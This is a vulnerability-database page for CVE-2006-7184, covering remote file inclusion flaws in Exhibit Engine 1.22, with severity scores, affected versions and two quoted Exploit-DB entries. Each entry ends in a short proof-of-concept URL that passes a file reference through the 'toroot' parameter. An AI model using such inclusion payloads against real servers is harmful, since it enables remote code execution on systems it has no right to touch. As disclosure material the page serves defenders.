CVE-2006-7184
published 2007-03-30CVE-2006-7184: Multiple PHP remote file inclusion vulnerabilities in Exhibit Engine (EE) 1.22, and possibly earlier, allow remote attackers to execute arbitrary PHP code via…
PriorityP433medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
1.93%
77.5th percentile
Multiple PHP remote file inclusion vulnerabilities in Exhibit Engine (EE) 1.22, and possibly earlier, allow remote attackers to execute arbitrary PHP code via a URL in the toroot parameter to (1) fetchsettings.php or (2) fstyles.php. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| photography-on-the-net | exhibit_engine_2 | <= 1.22 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Exhibit Engine 1.22 - 'fstyles.php?toroot' Remote File Inclusion
exploitdb·2006-10-30
CVE-2006-7184 Exhibit Engine 1.22 - 'fstyles.php?toroot' Remote File Inclusion
Exhibit Engine 1.22 - 'fstyles.php?toroot' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/20793/info
Exhibit Engine Software is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.
A successful exploit of these issues allows an attacker to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
Version 1.22 is vulnerable to these issues; other versions may also be affected.
http://www.example.com/fstyles.php?toroot=shell
Exploit-DB
Exhibit Engine 1.22 - 'fetchsettings.php?toroot' Remote File Inclusion
exploitdb·2006-10-30
CVE-2006-7184 Exhibit Engine 1.22 - 'fetchsettings.php?toroot' Remote File Inclusion
Exhibit Engine 1.22 - 'fetchsettings.php?toroot' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/20793/info
Exhibit Engine Software is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.
A successful exploit of these issues allows an attacker to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
Version 1.22 is vulnerable to these issues; other versions may also be affected.
http://www.example.com/fetchsettings.php?toroot=shell
No writeups or analysis indexed.
2007-03-30
Published